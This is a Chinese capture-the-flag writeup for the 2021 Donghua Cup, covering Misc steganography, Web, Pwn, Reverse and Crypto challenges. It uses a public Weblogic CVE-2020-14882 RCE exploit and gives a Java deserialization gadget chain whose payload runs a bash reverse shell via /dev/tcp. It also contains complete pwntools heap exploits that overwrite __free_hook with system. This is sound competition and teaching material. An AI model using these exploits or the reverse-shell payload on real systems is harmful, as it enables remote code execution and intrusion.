2021年全国大学生网络安全邀请赛暨第七届”东华杯”上海市大学生网络安全大赛Writeup Misc checkin 题目给了+AGYAbABhAGcAewBkAGgAYgBfADcAdABoAH0-
是UTF-7编码,解码得到flag
flag为:
project 下载附件,解压之后发现这是道工控题目,但是解压之后里面有一个压缩包problem_bak.zip
解压得到你来了~
这里面一共有三段数据,第一段是base64编码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 6KGo5oOF5YyF5paH5YyW77yM5piv6ZqP552A572R57uc56S+5Lqk5rKf6YCa55qE5aKe5aSa5Ye6 546w55qE5LiA56eN5Li75rWB5paH5YyW44CC5LiA5Liq5Lq655qE6KGo5oOF5YyF5piv5YW26ZqQ 6JeP6LW35p2l55qE55yf5oiR77yM5LiA5Liq5Zu95a6255qE6KGo5oOF5YyF6YeM6IO955yL5Yiw 6L+Z5Liq5Zu95a6255qE6KGo5oOF44CC4oCM4oCM4oCM4oCM4oCN4oCs4oCs4oCM5pyJ5pe25YCZ 77yM6KGo5oOF5YyF6KGo6L6+55qE5piv5LiN6IO96YGT56C055qE55yf5a6e5oOz5rOV5ZKM5oSf 5Y+X77yM6K+t6KiA5ZKM5paH5a2X55qE5bC95aS077yM5bCx5piv6KGo5oOF5YyF5pa95bGV55qE 56m66Ze044CCDQrooajmg4XljIXmmK/nvZHnu5zor63oqIDnmoTkuIDnp43ov5vljJbvvIzlroPn moTkuqfnlJ/lkozmtYHooYzkuI7lhbbnibnlrprnmoTigJzigIzigIzigIzigIzigI3vu7/igI3i gI3nlJ/lrZjnjq/looPigJ3mnInlhbPjgILlhbbov73msYLphpLnm67jgIHmlrDlpYfjgIHosJDo sJHnrYnmlYjmnpznmoTnibnngrnvvIzigIzigIzigIzigIzigI3vu7/igIzigKzkuI7lubTovbvk urrlvKDmiazkuKrmgKflkozmkJ7mgKrnmoTlv4PnkIbnm7jnrKbigIzigIzigIzigIzigI3vu7/i gIzigKzjgIINCuihqOaDheWMheS5i+aJgOS7peiDveWkn+Wkp+iMg+WbtOWcsOS8oOaSre+8jOKA jOKAjOKAjOKAjOKAje+7v+KArOKAjeaYr+WboOS4uuWFtuW8peihpeS6huaWh+Wtl+S6pOa1geea hOaer+eHpeWSjOaAgeW6puihqOi+vuS4jeWHhuehrueahOW8seeCue+8jOacieaViOWcsOaPkOmr mOS6huayn+mAmuaViOeOh+OAgumDqOWIhuihqOaDheWMheWFt+acieabv+S7o+aWh+Wtl+eahOWK n+iDve+8jOKAjOKAjOKAjOKAjOKAje+7v+KAjeKAjei/mOWPr+S7peiKguecgeaJk+Wtl+aXtumX tOKAjOKAjOKAjOKAjOKAje+7v+KAjOKAjOOAgumaj+edgOaZuuiDveaJi+acuueahOWFqOmdouaZ ruWPiuWSjOekvuS6pOW6lOeUqOi9r+S7tueahOWkp+mHj+S9v+eUqO+8jOihqOaDheWMheW3sue7 j+mrmOmikeeOh+WcsOWHuueOsOWcqOS6uuS7rOeahOe9kee7nOiBiuWkqeWvueivneW9k+S4reOA gg0K
解码得到:
1 2 3 4 表情包文化,是随着网络社交沟通的增多出现的一种主流文化。一个人的表情包是其隐藏起来的真我,一个国家的表情包里能看到这个国家的表情。有时候,表情包表达的是不能道破的真实想法和感受,语言和文字的尽头,就是表情包施展的空间。 表情包是网络语言的一种进化,它的产生和流行与其特定的“生存环境”有关。其追求醒目、新奇、谐谑等效果的特点,与年轻人张扬个性和搞怪的心理相符。 表情包之所以能够大范围地传播,是因为其弥补了文字交流的枯燥和态度表达不准确的弱点,有效地提高了沟通效率。部分表情包具有替代文字的功能,还可以节省打字时间。随着智能手机的全面普及和社交应用软件的大量使用,表情包已经高频率地出现在人们的网络聊天对话当中。
通过这解码得到的结果可以明显的观察到有隐藏字符
通过解0宽字符得到hurryup
,很明显这应该是某个地方的密钥,但现在暂时还未遇到,继续往下看
在线解0宽字符的网址:https://330k.github.io/misc_tools/unicode_steganography.html
第二部分说了是quoted-printable
加密,编码方式是,在线解密得到
其中的文字是跟第一段base64的文字相吻合的。
第三段说了是jpg图片,并且是base64加密的数据
这段base64数据是没有添加数据头的,自行补上data:image/jpg;base64,
,然后转为图片得到这张图
用010打开,发现图片结尾FF D9之后是有多余的数据的
最终发现是OurSecret隐写
,因为用这个软件打开,如果图片不是OurSecret隐写
,那么将不会显示数据大小的
这里显示了数据的大小,也就证实了是OurSecret隐写
,密钥就是第一段0宽解密出来得到的hurryup
所以flag为:
1 flag{f3a5dc36-ad43-d4fa-e75f-ef79e2e28ef3}
JumpJumpTiger jump.exe打开ida,查看到hint
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 int main(int argc, const char **argv, const char **envp){ int v4[100 ]; // [rsp+20h] [rbp-60h] int v5[101 ]; // [rsp+1B0h] [rbp+130h] int v6; // [rsp+344h] [rbp+2C4h] int v7; // [rsp+348h] [rbp+2C8h] int i; // [rsp+34Ch] [rbp+2CCh] printf("This is your hint!!!" ); v7 = 0 ; v6 = 0 ; for (i = 0 ; i <= 99 ; ++i) { if (i & 1 ) v4[v6++] = i; else v5[v7++] = i; } return 0 ; }
大致意思,奇偶分离。
查看jump.exe内码,发现大量疑似base64编码,直接提取
1 /i9VjB/O4RAwA0QKSGkgZoJARAgAAABNASQUEhAEAUQgAABAABA4DA/A2AwABQD4ACAAUIDABAAAQBEnAswVUYEUBAAAQAFgBAQEUlGEBQwVwRI4BAwWcTHBBQwZ8YLsC5w5kaMcE1Q88/SsEuhCEcPAEURvEOTfFFhdwUXiERx8QBaaFaRqEtRBGsCtE7YNG+hI08dZHIxx8xfIE6xtcbiSJ3CvIrevJ/B/wWe/H9xA7f/Q2NwkBnDbAJQJUJFsBXQ9ccG1BMw74aIBCtAr4veLFQBxEKU/HShZ4ee3HChm4xefHYhk4CeAH/hN42eqHrhT...共八百万字符
直接尝试奇偶分离
1 2 3 4 5 6 7 8 9 10 11 12 file = open ("in.txt" ) file2 = open ("out.txt" ,"r+" ) for line in file: tmp = line print (tmp) s = '' for i in range (len (tmp)): if i & 2 == 1 : s += tmp[i] file2.write(s) print (len (s))
刚好拿到两串base64编码均以=号结尾
1 /9j/4AAQSkZJRgABAQEAAQABAAD/2wBDAAUDBAQEAwUEBAQFBQUGBwwIBwcHBw8LCwkMEQ8SEhEPERETFhwXExQaFRERGCEYGh0dHx8fExciJCIeJBweHx7/2wBDAQUFBQcGBw4ICA4eFBEUHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh7/wAARCAQ4B4ADAREAAhEBAxEB/8QAHQAAAgIDAQEBAAAAAAAAAAAAAQIAAwQFBgcICf/EAEUQAQABAwMDAwMDAwMDAwECDwECAAMRBBIhBTFBBiJR...共四百万字符
分别解码,得到了一张jpg和一张png,两张图片看起来是一样的,很明显就是盲水印了,直接使用命令:
1 python bwmforpy3.py decode 2.jpg 2.png flag.png
得到flag.png,打开即能看到flag
flag为:
1 flag{72f73bbe-9193-e59a-c593-1b1cb8f76714}
Web apacheprOxy 打开附件,发现这是Weblogic
Weblogic有一个cve-2020-14882远程命令执行漏洞,GitHub上有现成的exp
EXP地址:https://github.com/zhzyker/exphub/blob/master/weblogic/cve-2020-14882_rce.py
因为开了反代,直接访问就进了i春秋官网了,抓个包获取一下真实的题目环境地址
使用命令:
1 python 1.py -u "http://47.104.100.25:7410/" -c "ls /"
然后直接cat /flag:
1 python 1.py -u "http://47.104.100.25:7410/" -c "cat /flag"
所以flag为:
1 flag{da77ef49-5958-40d5-b426-664b8299e576}
EzGadget 开始审计,IndexController.java
1 2 3 4 5 6 7 8 ..... ObjectInputStream objectInputStream = new ObjectInputStream(inputStream); String name = objectInputStream.readUTF(); int year = objectInputStream.readInt(); if (name.equals("gadgets") && year == 2021) { objectInputStream.readObject(); } .....
绕过这里再输出流再
1 2 oos.writeUTF("gadgets"); oos.writeInt(2021);
就好了
ToStringBean.java
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 public String toString() { ToStringBean toStringBean = new ToStringBean(); Class clazz = toStringBean.defineClass((String)null, this.ClassByte, 0, this.ClassByte.length); Object var3 = null; try { var3 = clazz.newInstance(); } catch (InstantiationException var5) { var5.printStackTrace(); } catch (IllegalAccessException var6) { var6.printStackTrace(); } return "enjoy it."; }
可以看到加载了字节码,这里加载字节码的函数是toString,cc5链的BadAttributeValueExpException的readobject方法正好调用了toString,该类是jdk自带的,并且参数可控
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 import com.ezgame.ctf.tools.ToStringBean; import ezgame.ctf.bean.User; import javax.management.BadAttributeValueExpException; import java.io.IOException; import java.io.InputStream; import java.lang.reflect.Field; public class exp { public static void main(String[] args) throws Exception { InputStream inputStream = evil.class.getResourceAsStream("evil.class"); byte[] bytes = new byte[inputStream.available()]; inputStream.read(bytes); ToStringBean sie =new ToStringBean(); Field bytecodes = Reflections.getField(sie.getClass(),"ClassByte"); Reflections.setAccessible(bytecodes); Reflections.setFieldValue(sie,"ClassByte",bytes); BadAttributeValueExpException exception = new BadAttributeValueExpException("exp"); Reflections.setFieldValue(exception,"val",sie); String a=Serialize.serialize(exception); System.out.print(a); } }
加载的字节码类
1 2 3 4 5 6 7 8 9 10 11 class exp{ static { try { Runtime.getRuntime().exec("bash -c 'bash -i >& /dev/tcp/ip/port 0>&1'"); } catch(){ } } }
这里进一下if
1 2 writeUTF("gadgets"); writeInt(2021);
生成的payload可以直接打,之后vps监听收到反弹的shell
Pwn cpp1 2.31 漏洞点在edit里 ,可以造成溢出 用0x80的chunk填满tcache后 溢出打size 造成堆快重叠,并且释放重叠的堆块进unsortedbin 然后show出libc 后面就正常的tcache attack 溢出打freehook为system getshell
Exp如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 from pwn import *context.log_level = "debug" io = remote("47.104.143.202" ,"43359" ) def menu (choice ): io.sendlineafter(">>" ,str (choice)) def add (index,size ): menu(1 ) io.sendlineafter(">>" ,str (index)) io.sendlineafter(">>" ,str (size)) def edit (index,content ): menu(2 ) io.sendlineafter(">>" ,str (index)) io.sendlineafter(">>" ,content) def show (index ): menu(3 ) io.sendlineafter(">>" ,str (index)) def delete (index ): menu(4 ) io.sendlineafter(">>" ,str (index)) def look (): global io gdb.attach(io) for i in range (0 ,7 ): add(i,0x80 ) add(7 ,0x18 ) add(8 ,0x50 ) add(9 ,0x20 ) add(10 ,0x30 ) edit(7 ,b"a" *0x10 + p64(0 ) + b"\x91" ) for i in range (0 ,7 ): delete(i) delete(8 ) for i in range (0 ,7 ): add(i,0x80 ) add(8 ,0x50 ) show(9 ) info = u64(io.recvuntil("\x7f" )[-6 :].ljust(8 ,b"\x00" )) malloc_hook = info - 96 - 0x10 libc = ELF("./libc-2.31.so" ) libc_base = malloc_hook - libc.sym["__malloc_hook" ] free_hook = libc_base + libc.sym["__free_hook" ] success("free_hook:" +hex (free_hook)) system = libc_base + libc.sym["system" ] add(11 ,0x20 ) add(12 ,0x18 ) add(13 ,0x18 ) add(14 ,0x18 ) delete(12 ) delete(14 ) edit(13 ,p64(0 )*3 + p64(0x21 ) + p64(free_hook)) add(14 ,0x18 ) add(15 ,0x18 ) edit(15 ,p64(system)) edit(14 ,"/bin/sh\x00" ) delete(14 ) io.interactive()
flag为:
1 flag{96f7801e4e658271915cf5ab3aa26ee6}
bg3 泄露libc:因为可以申请大chunk,于是 释放一个>0x420chunk 进unsortedbin 然后申请回来 直接show得到libc get shell : 漏洞点在add里面 相同index的size可以叠加 于是通过溢出打free_hook为system get shell
Exp如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 from pwn import *context.log_level = "debug" io = remote("47.104.143.202" ,"25997" ) def menu (choice ): io.sendlineafter("Select:" ,str (choice)) def add (index,size ): menu(1 ) io.sendlineafter("Index:" ,str (index)) io.sendlineafter(":" ,str (size)) def edit (index,content ): menu(2 ) io.sendlineafter("Index:" ,str (index)) io.sendlineafter("BugInfo:" ,content) def show (index ): menu(3 ) io.sendlineafter("Index:" ,str (index)) def delete (index ): menu(4 ) io.sendlineafter("Index:" ,str (index)) def look (): global io gdb.attach(io) add(0 ,0x420 ) add(1 ,0x18 ) delete(0 ) add(0 ,0x420 ) show(0 ) info = u64(io.recvuntil("\x7f" )[-6 :].ljust(8 ,b"\x00" )) print (hex (info))libc = ELF("./libc-2.31.so" ,checksec = 0 ) malloc_hook = info - 96 - 0x10 libc_base = malloc_hook - libc.sym["__malloc_hook" ] system = libc_base + libc.sym["system" ] free_hook = libc_base + libc.sym["__free_hook" ] add(2 ,0x18 ) delete(2 ) add(2 ,0x18 ) delete(2 ) add(2 ,0x18 ) delete(2 ) add(2 ,0x18 ) add(3 ,0x18 ) add(4 ,0x18 ) delete(4 ) delete(3 ) edit(2 ,p64(0 )*4 + p64(free_hook)) add(5 ,0x18 ) add(6 ,0x18 ) edit(6 ,p64(system)) edit(5 ,b"/bin/sh\x00" ) delete(5 ) io.interactive()
flag为:
1 flag{7240aca686aa4bc4d7697b2d7b5c7655}
gcc2 漏洞点在Remove里,有uaf。 leak_libc : 通过uaf首先泄露堆地址 然后改tcache的fd指针指向原本地址+0x10处 再申请回来时,可以造成堆快向下的0x10溢出,溢出改size为0xe1 然后对0xe1的chunk进行edit绕过double free check 把该chunk释放7次进tcache中 再释放一次 进入unsortedbin show得到libc 最后利用uaf直接tcache attack打free_hook为system get shell.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 from pwn import *context.log_level = "debug" io = remote("47.104.143.202" ,"15348" ) def menu (choice ): io.sendlineafter(">>" ,str (choice)) def add (index,size ): menu(1 ) io.sendlineafter(">>" ,str (index)) io.sendlineafter(">>" ,str (size)) def edit (index,content ): menu(2 ) io.sendlineafter(">>" ,str (index)) io.sendlineafter(">>" ,content) def show (index ): menu(3 ) io.sendlineafter(">>" ,str (index)) def delete (index ): menu(4 ) io.sendlineafter(">>" ,str (index)) def look (): global io gdb.attach(io) add(0 ,0x60 ) add(1 ,0x60 ) add(2 ,0x60 ) add(3 ,0x60 ) add(4 ,0x18 ) delete(1 ) edit(1 ,p64(0 )+p64(0x71 )) delete(0 ) show(0 ) io.recvuntil("\n" ) chunk_addr = u64(io.recv(6 ).ljust(8 ,b'\x00' )) print (hex (chunk_addr))fake_addr = chunk_addr + 0x10 print (hex (fake_addr))edit(0 ,p64(fake_addr)) add(5 ,0x60 ) add(6 ,0x60 ) edit(6 ,b"a" *0x58 + b"\xe1" ) for i in range (0 ,7 ): edit(2 ,p64(0 )*2 ) delete(2 ) edit(2 ,p64(0 )*2 ) delete(2 ) show(2 ) info = u64(io.recvuntil("\x7f" )[-6 :].ljust(8 ,b"\x00" )) print (hex (info))libc = ELF("./libc-2.31.so" ,checksec = 0 ) malloc_hook = info - 96 - 0x10 libc_base = malloc_hook - libc.sym["__malloc_hook" ] free_hook = libc_base + libc.sym["__free_hook" ] system = libc_base + libc.sym["system" ] add(9 ,0x18 ) add(10 ,0x18 ) delete(9 ) delete(10 ) edit(10 ,p64(free_hook)) add(11 ,0x18 ) add(12 ,0x18 ) edit(12 ,p64(system)) add(13 ,0x18 ) edit(13 ,b"/bin/sh\x00" ) delete(13 ) io.interactive()
flag为:
1 flag{c9749ef8cbfdc4fc56542daea489a71c}
boom_script 这题是c解释器有关的题,正好前一段时间有师傅给我发了类似的题,这题是uaf的漏洞,通过字符串的变换可以进行堆块的申请与释放,来进行泄露和getshell
Exp:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 from pwn import *context.log_level = "debug" io = remote("47.104.143.202" ,"41299" ) def look (): global io gdb.attach(io) def shell (payload ): io.recvuntil("$" ) io.sendline(str (1 )) io.recvuntil('length:' ) io.sendline(str (len (payload))) io.recvuntil('code:' ) io.send(payload) def main (): payload=""" a="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"; b=a; a="bbbbbb"; c=0; prints(b); array arr[20]; arr[0]=1193046; arr[1]=1193046; b="asdasd"; a1="cccccccc"; a2="cccccccc"; a3="cccccccc"; a3="cccccccc"; a4="cccccccc"; a5="cccccccc"; a9="cccccccc"; tc="sssssssssssssssssssssssssssssssssssssssssssssssss"; a6="sssssssssssssssssssssssssssssssssssssssssssssssss"; a7="/bin/sh"; a8="/bin/sh"; a6="ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss"; tc="ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss"; prints("dddddd"); inputn(c); arr[0]=c; arr[1]=c; tc1="sssssssssssssssssssssssssssssssssssssssssssssssss"; array arr1[1]; prints("dddddd"); inputn(c); arr1[0]=c; a7="aaa"; inputn(c); """ shell(payload) libc_base=u64(io.recvuntil("\x7f" )[-6 :].ljust(8 ,b'\x00' ))-0x1ebbe0 libc=ELF('./libc.so.6' ,checksec = 0 ) success("libc_base" +hex (libc_base)) free_hook=libc_base+libc.sym['__free_hook' ] system=libc_base+libc.sym['system' ] success("free_hook:" +hex (free_hook)) success("system:" +hex (system)) io.sendlineafter("dddddd\n" ,str (free_hook-0x28 )) io.sendlineafter("dddddd\n" ,str (system)) io.interactive() if __name__ == '__main__' : main()
flag为:
1 flag{35f2d3a9-bddc-9ffe-e8f7-ab999010b196}
Reverse ooo 送分题,就是做慢了,呜呜呜
照着搞就行了,一如既往,偷懒,暴力跑
flag为:
1 flag{13f35663-50a4-477b-278b-b711026ff7ad}
mod 这道题关键是花指令的去除,偷偷懒,只去除算法段,丢IDA F5
好了,base魔改,懒得分析算法,直接暴力跑
flag:
1 flag{5a073724-8223-413d-11fa-d53b133df89e}
Hell’s Gate 刚开始拿到这题,看到了很多个0x100感觉是RC4,就很激动(秒了,秒了),根据习惯,我还是先爆破,再来分析算法,单步到如下图的时候,发现这里一直指针异常,说明有异常处理之类的东西,然后果然。。。。
跟到00416F90函数,上面有部分貌似是反调试(反正没检测到我OD,估计是检测windbg之类的),能处理就处理吧,不过多阐述。找到算法段,发现了些奇奇怪怪的东西,类似于下图还有很多种这个代码。
Retf顾名思义,能给cs寄存器赋值,而cs寄存器为23的时候代表是32位汇编模式,33的时候则是64汇编模式,所以下面的汇编代码是64位的,windbg貌似也不能调试起来(也懒得找原因,好像是异常)因为每个64位汇编call代码量普遍不多,我就用CE去看汇编代码,逐个分析功能,如下图,就是个指针赋值call,经过一段时间分析,发现是tea算法
脚本如下:
flag为:
1 flag{0f4d0db3-668d-d58c-abb9-eb409657eaa8}
hello 调用JNI
String2 可以用log找到
So代码
脚本如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 raw_sign = '308202e4308201cc020101300d06092a864886f70d010105050030373116301406035504030c0d416e64726f69642044656275673110300e060355040a0c07416e64726f6964310b30090603550406130255533020170d3231303330363134333034385a180f32303531303232373134333034385a30373116301406035504030c0d416e64726f69642044656275673110300e060355040a0c07416e64726f6964310b300906035504061302555330820122300d06092a864886f70d01010105000382010f003082010a0282010100cbf2b09e4308ebb459e8841e5a7b920497fef2b349e80648f7eb35f48d40a75e7ce7945b8b42d197bec0bf177e6c9899ed707dcc4a726cb14c1a69b0c4a02474806fa73cfb10e10f7b1665021c24762b6edad65ca63cea3c72e0d4e4ca3f98301173eec3254337af1f5a11f779ecbe04d1b74d53f5835e011222155a56f97e00d75374cd93080dfa087cd356a99fe1eebf5d6d5e31846aad5252c3a17a4656e2e210ce1c7aa4d147fb8cf440a50add61bbb2ec299a2e0dab0b4504796ac3a899da553ab1d83576691ab23409d18398014b3b5eaf12e83f4d99aa09e1e4e4cae133530730c1133da2b3dee37b58eb1a5795b221ec5a8830731a41167d295f9e1b0203010001300d06092a864886f70d010105050003820101000e4740235e9cf2be33de3e06d777139cbbc5cf0622285c17da04697b8067318aaf8df0fbb4d3166f293ea15aa2592f06eb6929af063722ac9f30ad85e2c087564931d6ac65fcd5fbc864b3dc9841e039c6e1d5fbc5c2f8adf90a547bc4ebc07d387914db24451c2cc89925359bd3bb0750c7aabf9d743b1893e98bbc8ff74b24fc0b4be2dbaaf1c917bba01496d0617ffc3a4a8b7a6e79a3036298a6ebf57bb00001e43a0b242864eebb0fcec9e323144d4447c878430f18e6e358ad97566fa04d1f07b171c1476c9af5a1eba0bf6616e219c0b9e1299d09fecded24a880397f92e0f99d8951228c7770c184fd77adff943bfc8b6aa524c5f0a6d7686fe35486' enc = [0xCA , 0xEB , 0x4A , 0x8A , 0x68 , 0xE1 , 0xA1 , 0xEB , 0xE1 , 0xEE , 0x6B , 0x84 , 0xA2 , 0x6D , 0x49 , 0xC8 , 0x8E , 0x0E , 0xCC , 0xE9 , 0x45 , 0xCF , 0x23 , 0xCC , 0xC5 , 0x4C , 0x0C , 0x85 , 0xCF , 0xA9 , 0x8C , 0xF6 , 0xE6 , 0xD6 , 0x26 , 0x6D , 0xAC , 0x0C , 0xAC , 0x77 , 0xE0 , 0x64 ] for i in range (0 , 42 ): enc[i] = (enc[i] << 3 & 0xff ) + (enc[i] >> 5 & 0xff ) flag = "" for i in range (len (enc)): index = i * 27 + 327 magic = ord (raw_sign[index]) + i flag += chr (magic ^ enc[i]) print flag
flag为:
1 flag{d5577edd-8211-7a0e-f23a-305b0b10683f}
Crypto BlockEncrypt 反编译,得到不完整的加密函数,可以发现是aes,然后解密
脚本如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 from pwn import *import hashlibimport strings="flag{abcdef0123456789-}" def f (a,b ): m=[] for i in range (10 ): m.append(str (i)) for i in range (26 ): m.append(chr (i+0x41 )) m.append(chr (i+0x61 )) for i in m: for j in m: for k in m: for p in m: t=i+j+k+p+a if (hashlib.sha256(t.encode()).hexdigest()==b): print ("find" ) return t[:4 ] sh=remote("47.104.183.8" ,"47971" ) sh.recvuntil(b"X+" ) a=(sh.recvuntil(b")" ,drop=True ).decode()) sh.recvuntil(b"== " ) b=(sh.recvuntil(b"\n" ,drop=True ).decode()) sh.send(f(a,b).encode()) sh.recv() print (sh.recv().decode())sh.send(b'1' ) sh.recv() sh.recvuntil(b"\n" ,drop=True ) flag=(sh.recvuntil(b"\n[+]" ,drop=True )) print ()t=0 r="" while 1 : for i in s: m=r+i m=m.encode() sh.send(b'2' ) sh.send(m) sh.recv() sh.recv() sh.recvuntil(b"CipherText:" ,drop=True ) c=(sh.recvuntil(b"\n[+]" ,drop=True )) if (c[t]==flag[t]): r=r+i t+=1 print (r)
flag为:
1 flag{ad7e9276-de18-52b8-8c1c-3db559274f2d}